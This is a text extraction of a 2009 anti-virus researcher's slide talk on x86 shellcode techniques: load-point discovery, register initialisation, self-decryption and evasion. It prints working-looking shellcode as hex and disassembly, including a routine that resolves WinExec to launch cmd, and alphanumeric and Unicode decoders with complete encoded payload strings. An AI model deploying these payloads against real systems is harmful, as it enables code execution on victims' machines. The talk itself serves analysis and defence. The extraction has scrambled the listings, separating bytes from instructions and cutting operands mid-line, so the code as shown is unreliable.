Transcript Shellgames

Shellgames
Peter Ferrie
Senior Anti-virus Researcher
4 February, 2009
1
Outside the Shell
Gaining control

Buffer overflow

Double-free

Function-pointer hijack

NULL-pointer access (rare)

And others
Peter Ferrie, Microsoft Corporation
2
Outside the Shell
Types of shellcode

Stack-based

Heap-based

Other memory locations
Peter Ferrie, Microsoft Corporation
3
Inside the Shell
Finding the load-point

CALL->POP


FPU



Many FPU instructions store EIP in the Last Instruction Pointer field
All except FNINIT, FNCLEX, FLDCW, FNSTCW, FNSTSW, FNSTENV, FLDENV, FN/XSAVE,
F[X]RSTOR
SEH




Often to earlier memory location to avoid zeroes in the code
Write to a known "safe" memory location
Raise exception
Exception address is the load-point
Don't care
Peter Ferrie, Microsoft Corporation
4
CALL->POP Method
l1: EB xx
l2: 5x
...
l3: E8 xx FF FF FF
JMP
POP
SHORT l3
reg32
CALL NEAR
l2
Alternative for larger shellcode (> 129 bytes)
l1:
l2:
l3:
l4:
EB 02
EB 05
E8 F9 FF FF FF
5x
...
Peter Ferrie, Microsoft Corporation
JMP
JMP
CALL
POP
SHORT l3
SHORT l4
NEAR l2
reg32
5
FPU Method
l1:[DB E3
FNINIT] (optional)
Dx xx
[FPU instruction]
D9 74 24 F4 FNSTENV
BYTE PTR SS:[ESP - 0C]
5x
POP
reg32
...
Peter Ferrie, Microsoft Corporation
6
FPU Method (cont.)
Metasploit framework calls these "safe":

d9 c0 - c7 - fld st(0), st(i)

d9 c8 - cf - fxch st(0), st(i)

d9 d0
- fnop

d9 e1
- fabs st(0)

d9 e5
- fxam st(0)

d9 e8
- fld1 st(0)

d9 e9
- fldl2t st(0)

d9 ea
- fldl2e st(0)

d9 eb
- fldpi st(0)

d9 ec
- fldlg2 st(0)

d9 ed
- fldln2 st(0)

d9 ee
- fldz st(0)
Peter Ferrie, Microsoft Corporation
7
FPU Method (cont.)
Metasploit framework calls these "safe":

d9 f6
- fdecstp

d9 f7
- fincstp

da c0 - c7 - fcmovb st(0), st(i) (p2+)

da c8 - cf - fcmove st(0), st(i) (p2+)

da d0 - d7 - fcmovbe st(0), st(i) (p2+)

da d8 - df - fcmovu st(0), st(i) (p2+)

db c0 - c7 - fcmovnb st(0), st(i) (p2+)

db c8 - cf - fcmovne st(0), st(i) (p2+)

db d0 - d7 - fcmovnbe st(0), st(i) (p2+)

db d8 - df - fcmovnu st(0), st(i) (p2+)

dd c0 - c7 - ffree st(i)
Peter Ferrie, Microsoft Corporation
8
FPU Method (cont.)
There are others:

d9 e0
- fchs st(0)

d9 e4
- ftst st(0)

dd c8 - cf - fxch st(i), st(0)

df c0 - c7 - ffree st(i)

df c8 - cf - fxch st(i), st(0)
Peter Ferrie, Microsoft Corporation
9
FPU Method (cont.)
Accessing the Last Instruction Pointer field

FSTENV

Uses 28 bytes of memory

FSAVE

Uses 108 bytes of memory

Not supported by Metasploit framework

FXSAVE

Uses 512 bytes of memory

Requires oword-alignment

Not supported by Metasploit framework
Peter Ferrie, Microsoft Corporation
10
SEH Method
33
64
8B
83
57
57
64
B8
AB
B8
AB
B8
AB
0F
C0
8B 78 30
7F 10
C7 78
89 20
58 58 5C 59
8B 40 0C 40
40 FF E0 00
0B
Peter Ferrie, Microsoft Corporation
XOR
MOV
MOV
ADD
PUSH
PUSH
MOV
MOV
STOS
MOV
STOS
MOV
STOS
UD2
EAX, EAX
EDI, DWORD PTR FS:[EAX + 30]
EDI, DWORD PTR DS:[EDI + 10]
EDI, +78
EDI
EDI
DWORD PTR FS:[EAX], ESP
EAX, 595C5858
DWORD PTR ES:[EDI]
EAX, 400C408B
DWORD PTR ES:[EDI]
EAX, 00E0FF40
DWORD PTR ES:[EDI]
11
Don't Care Method
Most commonly ESP-relative

Stack-based shellcode

ESP used as direct memory pointer

Usually not encoded
Peter Ferrie, Microsoft Corporation
12
Example Shellcode
Plain binary

64
8B
8B
AD
8B
8B
8B
8B
03
33
l1: 45
8B
81
75
8B
03
03
68
8B
6A
56
FF
67 A1 30 00
78 0C
77 1C
78
77
74
5C
DF
ED
08
3C
3E 78
3E 20
14
3C
F3
74
F7
3C
63
F4
00
AB
3A 57 69 6E 45
3E 1C
AE
6D 64 00
D7
Peter Ferrie, Microsoft Corporation
MOV
MOV
MOV
LODS
MOV
MOV
MOV
MOV
ADD
XOR
INC
MOV
CMP
JNE
MOV
ADD
ADD
PUSH
MOV
PUSH
PUSH
CALL NEAR
EAX, DWORD PTR FS:[0030]
EDI, DWORD PTR DS:[EAX + 0C]
ESI, DWORD PTR DS:[EDI + 1C]
DWORD PTR DS:[ESI]
EDI, DWORD PTR DS:[EAX + 08]
ESI, DWORD PTR DS:[EDI + 3C]
ESI, DWORD PTR DS:[EDI + ESI + 78]
EBX, DWORD PTR DS:[EDI + ESI + 20]
EBX, EDI
EBP, EBP
EBP
EDX, DWORD PTR SS:[EBP*4 + EBX]
DWORD PTR DS:[EDI + EDX], "EniW"
l1
ESI, DWORD PTR DS:[EDI + ESI + 1C]
ESI, EDI
EDI, DWORD PTR DS:[EBP*4 + ESI]
"dmc"
ESI, ESP
+00
ESI
PTR EDI
13
Example Shellcode
Plain binary

68
8B
33
55
57
64
8B
8B
AD
8B
8B
8B
8B
03
l1: 45
8B
81
75
8B
03
03
FF
63 6D 64 00
FC
ED
8B 7D 30
7F 0C
77 1C
78
77
74
5C
DF
08
3C
3E 78
3E 20
14
3C
F3
74
F7
3C
D7
AB
3A 57 69 6E 45
3E 1C
AE
Peter Ferrie, Microsoft Corporation
PUSH
MOV
XOR
PUSH
PUSH
MOV
MOV
MOV
LODS
MOV
MOV
MOV
MOV
ADD
INC
MOV
CMP
JNE
MOV
ADD
ADD
CALL NEAR
"dmc"
EDI, ESP
EBP, EBP
EBP
EDI
EDI, DWORD PTR FS:[EBP + 30]
EDI, DWORD PTR DS:[EDI + 0C]
ESI, DWORD PTR DS:[EDI + 1C]
DWORD PTR DS:[ESI]
EDI, DWORD PTR DS:[EAX + 08]
ESI, DWORD PTR DS:[EDI + 3C]
ESI, DWORD PTR DS:[EDI + ESI + 78]
EBX, DWORD PTR DS:[EDI + ESI + 20]
EBX, EDI
EBP
EDX, DWORD PTR SS:[EBP*4 + EBX]
DWORD PTR DS:[EDI + EDX], "EniW"
l1
ESI, DWORD PTR DS:[EDI + ESI + 1C]
ESI, EDI
EDI, DWORD PTR DS:[EBP*4 + ESI]
PTR EDI
14
Example Shellcode
Binary without zeroes

68
8B
47
33
55
57
64
8B
8B
AD
8B
8B
8B
8B
03
l1: 45
8B
81
75
8B
03
03
FF
78 63 6D 64
FC
ED
8B 7D 30
7F 0C
77 1C
78
77
74
5C
DF
08
3C
3E 78
3E 20
14
3C
F3
74
F7
3C
D7
AB
3A 57 69 6E 45
3E 1C
AE
Peter Ferrie, Microsoft Corporation
PUSH
MOV
INC
XOR
PUSH
PUSH
MOV
MOV
MOV
LODS
MOV
MOV
MOV
MOV
ADD
INC
MOV
CMP
JNE
MOV
ADD
ADD
CALL NEAR
"dmcx"
EDI, ESP
EDI
EBP, EBP
EBP
EDI
EDI, DWORD PTR FS:[EBP + 30]
EDI, DWORD PTR DS:[EDI + 0C]
ESI, DWORD PTR DS:[EDI + 1C]
DWORD PTR DS:[ESI]
EDI, DWORD PTR DS:[EAX + 08]
ESI, DWORD PTR DS:[EDI + 3C]
ESI, DWORD PTR DS:[EDI + ESI + 78]
EBX, DWORD PTR DS:[EDI + ESI + 20]
EBX, EDI
EBP
EDX, DWORD PTR SS:[EBP*4 + EBX]
DWORD PTR DS:[EDI + EDX], "EniW"
l1
ESI, DWORD PTR DS:[EDI + ESI + 1C]
ESI, EDI
EDI, DWORD PTR DS:[EBP*4 + ESI]
PTR EDI
15
Example Shellcode
Alphanumeric ASCII

Mixed-case

56
33
4E
6A
58
34
50
33
l1: 46
6B
32
30
75
45
PUSH
ESI
XOR
ESI, DWORD PTR SS:[ESP]
DEC
ESI
41
PUSH
+41
POP
EAX
65
XOR
AL, 65
PUSH
EAX
34 64
XOR
ESI, DWORD PTR SS:[ESP]
INC
ESI
44 71 65 30 IMUL
EAX, DWORD PTR DS:[ESI*2 + ECX + 65], +30
44 71 66
XOR
AL, BYTE PTR DS:[ESI*2 + ECX + 66]
44 31 41
XOR
BYTE PTR DS:[ESI + ECX + 41], AL
[JNE
l1]
45
[encoded F0]
34 64
Peter Ferrie, Microsoft Corporation
16
Example Shellcode
Alphanumeric ASCII

Mixed-case

Decoder


V34dNjAX4eP34dFkDqe02Dqf0D1AuEE
Our shellcode

PvJOGBHAP0PwHIBWPMCKPGPLCJHCP1PJCLBGPqHHGoPnGoCKBpAMPjPKElP
cCLGEHAPWCwHCAKPjBFBABFBbBzDcCuP3PQAoPHEEPsAMCsPcDGA5BCGmB
oGmA7CXEHA1BpGNENDGPW
Peter Ferrie, Microsoft Corporation
17
Example Shellcode
Alphanumeric ASCII

Lower-case

6A
31
33
6A
33
6A
33
31
31
31
31
6A
31
33
6A
33
l1: 6B
32
6A
30
75
35
33
34
34
71
34
6E
34
34
71
71
71
33
34
34
30
34
68
68
PUSH
+33
XOR
DWORD PTR SS:[ESP], ESI
XOR
ESI, DWORD PTR SS:[ESP]
PUSH
+71
64
XOR
ESI, DWORD PTR SS:[ESP]
PUSH
+6E
64
XOR
ESI, DWORD PTR SS:[ESP]
31
XOR
DWORD PTR DS:[ESI + ECX], ESI
31
XOR
DWORD PTR DS:[ECX + 31], ESI
34
XOR
DWORD PTR DS:[ECX + 34], ESI
36
XOR
DWORD PTR DS:[ECX + 36], ESI
PUSH
+33
64
XOR
DWORD PTR SS:[ESP], ESI
64
XOR
ESI, DWORD PTR SS:[ESP]
PUSH
+30
64
XOR
ESI, DWORD PTR SS:[ESP]
71 34 30 [IMUL
EAX, DWORD PTR DS:[ESI*2 + ECX + 34], +30]
71 35
[XOR
AL, BYTE PTR DS:[ESI*2 + ECX + 35]]
[INC
ESI]
68 31 36
[XOR
BYTE PTR DS:[ESI + ECX + 36], AL]
[JNE
l1]
35
[encoded F0]
64
64
Peter Ferrie, Microsoft Corporation
18
Example Shellcode
Alphanumeric ASCII

Lower-case

Decoder


j314d34djq34djn34d1411q11q41q6j314d34dj034dkhq402hq5j0h16u55
Our shellcode

a6en228n2qrbdy1w0bdy160nno8o11093l6g1n8o2m2o6nok02206o7k4p129l
0u827w574w1k2k0921110w2x513t1r200s0h57012n5n155r0b136l2s1l264r5h
0v7p0nnm3p0w
Peter Ferrie, Microsoft Corporation
19
Example Shellcode
Alphanumeric ASCII

Upper-case

37
51
5A
56
54
58
33
56
58
34
50
30
48
48
30
30
l1: 41
41
42
54
32
32
30
58
50
38
4A
4A
AAA * 16
PUSH
ECX
POP
EDX
PUSH
ESI
PUSH
ESP
POP
EAX
30
XOR
ESI, DWORD PTR DS:[EAX]
PUSH
ESI
POP
EAX
41
XOR
AL, 41
PUSH
EAX
41 33
XOR
BYTE PTR DS:[ECX + 33], AL
DEC
EAX
DEC
EAX
41 30
XOR
BYTE PTR DS:[ECX + 30], AL
41 42
XOR
BYTE PTR DS:[ECX + 42], AL
INC
ECX
INC
ECX
INC
EDX
41 41 51 [IMUL
EAX, DWORD PTR DS:[ECX + 41], +10]
41 42
XOR
AL, BYTE PTR DS:[ECX + 42]
42 42
XOR
AL, BYTE PTR DS:[EDX + 42]
42 42
XOR
BYTE PTR DS:[EDX + 42], AL
POP
EAX
PUSH
EAX
41 43
CMP
BYTE PTR DS:[ECX + 43], AL
[JNE
l1]
49
[encoded E9]
Peter Ferrie, Microsoft Corporation
20
Example Shellcode
Alphanumeric ASCII

Upper-case

Decoder


7777777777777777777777QZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0
BBXP8ACJJI
IMUL 10 method
Peter Ferrie, Microsoft Corporation
21
Example Shellcode
Alphanumeric ASCII

Upper-case (improved)

56
54
5A
33
58
56
58
48
34
34
50
56
58
33
56
5A
34
30
30
l1: 42
46
5A
32
30
44
33
PUSH
ESI
PUSH
ESP
POP
EDX
32
XOR
ESI, DWORD PTR DS:[EDX]
POP
EAX
PUSH
ESI
POP
EAX
DEC
EAX
50
XOR
AL, 50
43
XOR
AL, 43
PUSH
EAX
PUSH
ESI
POP
EAX
32
XOR
ESI, DWORD PTR DS:[EDX]
PUSH
ESI
POP
EDX
31
XOR
AL, 31
44 31 34
XOR
BYTE PTR DS:[ESI + ECX +
44 31 41
XOR
BYTE PTR DS:[ESI + ECX +
INC
EDX
INC
ESI
44 51 54 30 [IMUL
EAX, DWORD PTR DS:[EDX*2
44 51 55
XOR
AL, BYTE PTR DS:[EDX*2 +
44 31 41
XOR
BYTE PTR DS:[ESI + ECX +
[JNE
l1]
4C
[encoded EF]
Peter Ferrie, Microsoft Corporation
34], AL
41], AL
+ ECX + 54], +30]
ECX + 55]
41], AL
22
Example Shellcode
Alphanumeric ASCII

Upper-case (improved)

Decoder


VTZ32XVXH4P4CPVX32VZ410D140D1AFBZDQT02DQU0D1AD3L
Our shellcode

AO5N2K5N0112500J0B5K0F2MOO5N0H08510G1N5NMOLNMN5I7A1A6O064
Q13351E5C2A4Z5A1KLK69KLMP182Z5O3U096P2I0J500BLMNO15321UKN0L0
2KL0W5H511GLP1S5LNE0A
Peter Ferrie, Microsoft Corporation
23
Example Shellcode
Alphanumeric Unicode

Mixed-case

34
6A
58
51
44
5A
42
52
4C
59
49
51
49
51
49
68
5A
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
49 00
49 00
4A
00
00
00
49 00
49 00
41
41
41
41
41
41
41
41
41
41
41
41
41
41
41
00
00
00
00
00
00
00
00
00
00
00
00
00
00 41
00
31
41 00
41 00
41 00
31
31
41 00
41 00
41 00
Peter Ferrie, Microsoft Corporation
XOR
PUSH
POP
PUSH
INC
POP
INC
PUSH
DEC
POP
DEC
PUSH
DEC
PUSH
DEC
PUSH
ADD
POP
ADD
ADD
DEC
DEC
DEC
ADD
ADD
ADD
DEC
DEC
AL, 00 * 27
+00
EAX + NOP
ECX + NOP
ESP + NOP
EDX + NOP
EDX + NOP
EDX + NOP
ESP + NOP
ECX + NOP
ECX + NOP
ECX + NOP
ECX + NOP
ECX + NOP
ECX + NOP
41004100
BYTE PTR DS:[ECX +
EDX
BYTE PTR DS:[ECX],
BYTE PTR DS:[ECX +
ECX + NOP
ECX + NOP
EDX
BYTE PTR DS:[ECX],
BYTE PTR DS:[ECX],
BYTE PTR DS:[ECX +
ECX + NOP
ECX + NOP
00], AL (NOP)
DH
00], AL (NOP)
DH
DH
00], AL (NOP)
24
Example Shellcode
Alphanumeric Unicode

Mixed-case (cont.)

42 00 41
42 00 41
42
00 51
49
00 31
00 41
49
00 51
49 00 41
49
00 51
49
00 31
00 31
00 31
00 41
49 00 41
4A
00 51
59 00 41
5A
00 42
l1: 41
00 42
41
00 42
41
Peter Ferrie, Microsoft Corporation
00
00
00
00
00
00
00
00
00
00
00
00
00
00
INC
INC
INC
ADD
DEC
ADD
ADD
DEC
ADD
DEC
DEC
ADD
DEC
ADD
ADD
ADD
ADD
DEC
DEC
ADD
POP
POP
ADD
INC
ADD
INC
ADD
INC
EDX + NOP
EDX + NOP
EDX
BYTE PTR DS:[ECX +
ECX
BYTE PTR DS:[ECX],
BYTE PTR DS:[ECX +
ECX
BYTE PTR DS:[ECX +
ECX + NOP
ECX
BYTE PTR DS:[ECX +
ECX
BYTE PTR DS:[ECX],
BYTE PTR DS:[ECX],
BYTE PTR DS:[ECX],
BYTE PTR DS:[ECX +
ECX + NOP
EDX
BYTE PTR DS:[ECX +
ECX + NOP
EDX
BYTE PTR DS:[EDX +
ECX
BYTE PTR DS:[EDX +
ECX
BYTE PTR DS:[EDX +
ECX
00], DL
DH
00], AL (NOP)
00], DL
00], DL
DH
DH
DH
00], AL (NOP)
00], DL
00], AL
00], AL
00], AL
25
Example Shellcode
Alphanumeric Unicode

Mixed-case (cont.)

41
00 42 00
00
6B 00
00
47 00
42
00
75 00
34 00
4A 00
42 00
4D
41 00
39 00
42 00
Peter Ferrie, Microsoft Corporation
ADD
BYTE PTR DS:[EDX + 00], AL
INC
ECX
ADD
BYTE PTR DS:[EDX + 00], AL
[IMUL
EAX, DWORD PTR DS:[ECX], +10]
[ADD
AL, BYTE PTR DS:[ECX + 02]]
[MOV
BYTE PTR DS:[EDX], AL]
INC EDX
[CMP
DWORD PTR DS:[ECX], +41]
[JNE
l1]
XOR
AL, 00
[encoded E2]
26
Example Shellcode
Alphanumeric Unicode

Mixed-case

Decoder


444444444444444444444444444444444444444jXAQADAZABARALAYAIAQAIA
QAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMA
GB9u4JB
Our shellcode

OCKOBDDKCONPDKCOLLDKCGMLFMDKCHLHDKCGOLDKCDONCHDKQLONMPL
CIOOCJMOUDKMDFKCQOLOJQGBIBNPECEKCDKCDONMLLCKGLCOLFNOCJMQ
EBHCHBCBMBDDKKDOVQEQFKOIGA
Peter Ferrie, Microsoft Corporation
27
Example Shellcode
Alphanumeric Unicode

Lower-case

None is known to exist
Peter Ferrie, Microsoft Corporation
28
Example Shellcode
Alphanumeric Unicode

Upper-case

34
51
44
58
5A
50
33
51
44
5A
42
52
4C
59
49
51
49
51
50
35
00
50
5A
49
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
41
00
41
41
41
41
41
00
00
00
00
00
41
41
41
41
41
41
41
41
41
41
41
41
41
00
41
00
00
00
00
00
00
00
00
00
00
00
00
00 41
00
00 31
00 41 00
00 31
00 41 00
Peter Ferrie, Microsoft Corporation
XOR
PUSH
INC
POP
POP
PUSH
XOR
PUSH
INC
POP
INC
PUSH
DEC
POP
DEC
PUSH
DEC
PUSH
PUSH
XOR
ADD
PUSH
POP
ADD
ADD
DEC
ADD
ADD
AL, 00 * 0E
ECX + NOP
ESP + NOP
EAX + NOP
EDX + NOP
EAX + NOP
EAX, DWORD PTR DS:[EAX]
ECX + NOP
ESP + NOP
EDX + NOP
EDX + NOP
EDX + NOP
ESP + NOP
ECX + NOP
ECX + NOP
ECX + NOP
ECX + NOP
ECX + NOP
EAX + NOP
EAX, 41004100
BYTE PTR DS:[ECX + 00], AL (NOP)
EAX + NOP
EDX
BYTE PTR DS:[ECX], DH
BYTE PTR DS:[ECX + 00], AL (NOP)
ECX
BYTE PTR DS:[ECX], DH
BYTE PTR DS:[ECX + 00], AL (NOP)
29
Example Shellcode
Alphanumeric Unicode

Upper-case (cont.)

49 00 41
49 00 41
4A
00 31
00 31
00 41
49 00 41
49 00 41
58 00 41
35 00 38
00 41
50 00 41
5A 00 41
42 00 41
42
00 51
49
00 31
00 41
49
00 51
49 00 41
49
00 51
49
00 31
00 31
00 31
Peter Ferrie, Microsoft Corporation
00
00
00
00
00
00
00 41
00
00
00
00
00
00
00
00
00
DEC
DEC
DEC
ADD
ADD
ADD
DEC
DEC
POP
XOR
ADD
PUSH
POP
INC
INC
ADD
DEC
ADD
ADD
DEC
ADD
DEC
DEC
ADD
DEC
ADD
ADD
ADD
ECX + NOP
ECX + NOP
EDX
BYTE PTR DS:[ECX],
BYTE PTR DS:[ECX],
BYTE PTR DS:[ECX +
ECX + NOP
ECX + NOP
EAX + NOP
EAX, 41003800
BYTE PTR DS:[ECX +
EAX + NOP
EDX + NOP
EDX + NOP
EDX
BYTE PTR DS:[ECX +
ECX
BYTE PTR DS:[ECX],
BYTE PTR DS:[ECX +
ECX
BYTE PTR DS:[ECX +
ECX + NOP
ECX
BYTE PTR DS:[ECX +
ECX
BYTE PTR DS:[ECX],
BYTE PTR DS:[ECX],
BYTE PTR DS:[ECX],
DH
DH
00], AL (NOP)
00], AL (NOP)
00], DL
DH
00], AL (NOP)
00], DL
00], DL
DH
DH
DH
30
Example Shellcode
Alphanumeric Unicode

Upper-case (cont.)

00 31
00 41 00
49 00 41 00
4A
00 51 00
49
00 31
00 41 00
59 00 41 00
5A
00 42 00
l1: 41
00 42 00
41
00 42 00
41
00 42 00
41
00 42 00
33 00 30
00 41 00
50 00
42
00 39 00
34 00
34 00
4A 00 42 00
Peter Ferrie, Microsoft Corporation
ADD
BYTE PTR DS:[ECX], DH
ADD
BYTE PTR DS:[ECX + 00], AL (NOP)
DEC
ECX + NOP
DEC
EDX
ADD
BYTE PTR DS:[ECX + 00], DL
DEC
ECX
ADD
BYTE PTR DS:[ECX], DH
ADD
BYTE PTR DS:[ECX + 00], AL (NOP)
POP
ECX + NOP
POP
EDX
ADD
BYTE PTR DS:[EDX + 00], AL
INC
ECX
ADD
BYTE PTR DS:[EDX + 00], AL
INC
ECX
ADD
BYTE PTR DS:[EDX + 00], AL
INC
ECX
ADD
BYTE PTR DS:[EDX + 00], AL
INC
ECX
ADD
BYTE PTR DS:[EDX + 00], AL
[IMUL
EAX, DWORD PTR DS:[ECX], +10]
[ADD
AL, BYTE PTR DS:[ECX + 02]]
[MOV
BYTE PTR DS:[EDX], AL]
INC
EDX
[CMP
BYTE PTR DS:[ECX], 41]
[JNE
l1]
XOR
AL, 00
[encoded E2]
31
Example Shellcode
Alphanumeric Unicode

Upper-case

Decoder


44444444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1
AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30A
PB944JB
Our shellcode

OCKOBDDKCONPDKCOLLDKCGMLFMDKCHLHDKCGOLDKCDONCHDKQLONMPL
CIOOCJMOUDKMDFKCQOLOJQGBIBNPECEKCDKCDONMLLCKGLCOLFNOCJMQ
EBHCHBCBMBDDKKDOVQEQFKOIGA
Peter Ferrie, Microsoft Corporation
32
Example Shellcode
Fewest unique bytes

Recent challenge run by MSEC

Run calc.exe on all major Windows platforms

Restricted register set, too

void __declspec(naked) __cdecl run(void *buffer)
{
__asm
{
push ebp
mov
esp, ebp
xor
eax, eax
xor
ecx, ecx
cdq
xor
ebx, ebx
xor
esi, esi
xor
edi, edi
jmp
dword ptr [ebp + 8]
}
}
Peter Ferrie, Microsoft Corporation
33
Example Shellcode
Fewest unique bytes

Recent challenge run by MSEC

Run calc.exe on all major Windows platforms

Restricted register set, too


void __declspec(naked) __cdecl run(void *buffer)
{
__asm
{
push ebp
mov
esp, ebp
xor
eax, eax
xor
ecx, ecx
cdq
xor
ebx, ebx
xor
esi, esi
xor
edi, edi
jmp
dword ptr [ebp + 8]
}
}
It can be done using only 3 bytes
Peter Ferrie, Microsoft Corporation
34
Example Shellcode
Fewest unique bytes

Recent challenge run by MSEC

Run calc.exe on all major Windows platforms

Restricted register set, too



void __declspec(naked) __cdecl run(void *buffer)
{
__asm
{
push ebp
mov
esp, ebp
xor
eax, eax
xor
ecx, ecx
cdq
xor
ebx, ebx
xor
esi, esi
xor
edi, edi
jmp
dword ptr [ebp + 8]
}
}
It can be done using only 3 bytes
Or even 2 bytes but platform-specific
Peter Ferrie, Microsoft Corporation
35
Common Characteristics
Get load point
Initialise registers
Read from memory
Decrypt
Write to memory
Adjust pointer
Loop
Peter Ferrie, Microsoft Corporation
36
Common Characteristics
Example decryptor
l1: EB
l2: 5A
52
31
66
B8
l3: 8B
31
01
31
89
83
E2
C3
l4: E8
1D
C9
B9 34 12
BC 9A 78 56
1A
C3
C3
C3
1A
C2 04
F1
DE FF FF FF
Peter Ferrie, Microsoft Corporation
JMP SHORT
POP
PUSH
XOR
MOV
MOV
MOV
XOR
ADD
XOR
MOV
ADD
LOOPD
RETD
CALL NEAR
l4
EDX
EDX
ECX, ECX
CX, 1234
EAX, 56789ABC
EBX, DWORD PTR DS:[EDX]
EBX, EAX
EBX, EAX
EBX, EAX
DWORD PTR DS:[EDX], EBX
EDX, +04
l3
l2
37
Common Characteristics
Get load-point
l1: EB
l2: 5A
52
31
66
B8
l3: 8B
31
01
31
89
83
E2
C3
l4: E8
1D
C9
B9 34 12
BC 9A 78 56
1A
C3
C3
C3
1A
C2 04
F1
DE FF FF FF
Peter Ferrie, Microsoft Corporation
JMP SHORT
POP
PUSH
XOR
MOV
MOV
MOV
XOR
ADD
XOR
MOV
ADD
LOOPD
RETD
CALL NEAR
l4
EDX
EDX
ECX, ECX
CX, 1234
EAX, 56789ABC
EBX, DWORD PTR DS:[EDX]
EBX, EAX
EBX, EAX
EBX, EAX
DWORD PTR DS:[EDX], EBX
EDX, +04
l3
l2
38
Common Characteristics
Initialise registers
l1: EB
l2: 5A
52
31
66
B8
l3: 8B
31
01
31
89
83
E2
C3
l4: E8
1D
C9
B9 34 12
BC 9A 78 56
1A
C3
C3
C3
1A
C2 04
F1
DE FF FF FF
Peter Ferrie, Microsoft Corporation
JMP SHORT
POP
PUSH
XOR
MOV
MOV
MOV
XOR
ADD
XOR
MOV
ADD
LOOPD
RETD
CALL NEAR
l4
EDX
EDX
ECX, ECX
CX, 1234
EAX, 56789ABC
EBX, DWORD PTR DS:[EDX]
EBX, EAX
EBX, EAX
EBX, EAX
DWORD PTR DS:[EDX], EBX
EDX, +04
l3
l2
39
Common Characteristics
Read from memory
l1: EB
l2: 5A
52
31
66
B8
l3: 8B
31
01
31
89
83
E2
C3
l4: E8
1D
C9
B9 34 12
BC 9A 78 56
1A
C3
C3
C3
1A
C2 04
F1
DE FF FF FF
Peter Ferrie, Microsoft Corporation
JMP SHORT
POP
PUSH
XOR
MOV
MOV
MOV
XOR
ADD
XOR
MOV
ADD
LOOPD
RETD
CALL NEAR
l4
EDX
EDX
ECX, ECX
CX, 1234
EAX, 56789ABC
EBX, DWORD PTR DS:[EDX]
EBX, EAX
EBX, EAX
EBX, EAX
DWORD PTR DS:[EDX], EBX
EDX, +04
l3
l2
40
Common Characteristics
Decrypt
l1: EB
l2: 5A
52
31
66
B8
l3: 8B
31
01
31
89
83
E2
C3
l4: E8
1D
C9
B9 34 12
BC 9A 78 56
1A
C3
C3
C3
1A
C2 04
F1
DE FF FF FF
Peter Ferrie, Microsoft Corporation
JMP SHORT
POP
PUSH
XOR
MOV
MOV
MOV
XOR
ADD
XOR
MOV
ADD
LOOPD
RETD
CALL NEAR
l4
EDX
EDX
ECX, ECX
CX, 1234
EAX, 56789ABC
EBX, DWORD PTR DS:[EDX]
EBX, EAX
EBX, EAX
EBX, EAX
DWORD PTR DS:[EDX], EBX
EDX, +04
l3
l2
41
Common Characteristics
Write to memory
l1: EB
l2: 5A
52
31
66
B8
l3: 8B
31
01
31
89
83
E2
C3
l4: E8
1D
C9
B9 34 12
BC 9A 78 56
1A
C3
C3
C3
1A
C2 04
F1
DE FF FF FF
Peter Ferrie, Microsoft Corporation
JMP SHORT
POP
PUSH
XOR
MOV
MOV
MOV
XOR
ADD
XOR
MOV
ADD
LOOPD
RETD
CALL NEAR
l4
EDX
EDX
ECX, ECX
CX, 1234
EAX, 56789ABC
EBX, DWORD PTR DS:[EDX]
EBX, EAX
EBX, EAX
EBX, EAX
DWORD PTR DS:[EDX], EBX
EDX, +04
l3
l2
42
Common Characteristics
Adjust pointer
l1: EB
l2: 5A
52
31
66
B8
l3: 8B
31
01
31
89
83
E2
C3
l4: E8
1D
C9
B9 34 12
BC 9A 78 56
1A
C3
C3
C3
1A
C2 04
F1
DE FF FF FF
Peter Ferrie, Microsoft Corporation
JMP SHORT
POP
PUSH
XOR
MOV
MOV
MOV
XOR
ADD
XOR
MOV
ADD
LOOPD
RETD
CALL NEAR
l4
EDX
EDX
ECX, ECX
CX, 1234
EAX, 56789ABC
EBX, DWORD PTR DS:[EDX]
EBX, EAX
EBX, EAX
EBX, EAX
DWORD PTR DS:[EDX], EBX
EDX, +04
l3
l2
43
Common Characteristics
Loop
l1: EB
l2: 5A
52
31
66
B8
l3: 8B
31
01
31
89
83
E2
C3
l4: E8
1D
C9
B9 34 12
BC 9A 78 56
1A
C3
C3
C3
1A
C2 04
F1
DE FF FF FF
Peter Ferrie, Microsoft Corporation
JMP SHORT
POP
PUSH
XOR
MOV
MOV
MOV
XOR
ADD
XOR
MOV
ADD
LOOPD
RETD
CALL NEAR
l4
EDX
EDX
ECX, ECX
CX, 1234
EAX, 56789ABC
EBX, DWORD PTR DS:[EDX]
EBX, EAX
EBX, EAX
EBX, EAX
DWORD PTR DS:[EDX], EBX
EDX, +04
l3
l2
44
Counter-examples
Initialise registers indirectly
Common direct ways

MOV

PUSH/POP
Arithmetic is indirect





ADC/ADD
AND
OR
SBB/SUB
XOR
Peter Ferrie, Microsoft Corporation
45
Counter-examples
Set EAX to 0

81 C8 FF FF FF FF
81 C0 01 00 00 00
OR
ADD
EAX, FFFFFFFF
EAX, 00000001
Can be applied to individual bits

81
81
81
81
81
C8
C8
E8
C8
C0
81
42
C3
3C
C4
81
42
C3
3C
C3
81
42
C3
3C
C3
81
42
C3
3C
C3
OR
OR
SUB
OR
ADD
EAX,
EAX,
EAX,
EAX,
EAX,
81818181
42424242
C3C3C3C3
3C3C3C3C
C3C3C3C4
Can be hidden among do-nothing instructions
Can also be made polymorphic…
Peter Ferrie, Microsoft Corporation
46
Counter-examples
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
D1
D0
D6
E7
E6
D8
CA
DB
F2
FE
E7
FD
CF
C5
C3
E2
E0
C4
E2
E6
C3
C2
F1
F2
C3
E6
D6
DB
DD
FB
CE
FF
66
11
A1
01
C9
FE
35
BD
04
AC
BE
46
E1
24
0F
CC
1D
B6
4C
51
89
3F
83
E1
DF
CB
85
5A
C2
75
48
D5
2B
B2
22
D3
D9
65
D2
BE
BA
CA
8E
38
58
F9
9C
85
2F
B7
1F
06
3E
D4
58
8F
20
3D
42
D9
B7
F4
3F
D7
DE
0F
1B
9E
BA
85
6A
56
53
8F
44
7E
31
4A
25
24
FE
63
C6
20
92
0B
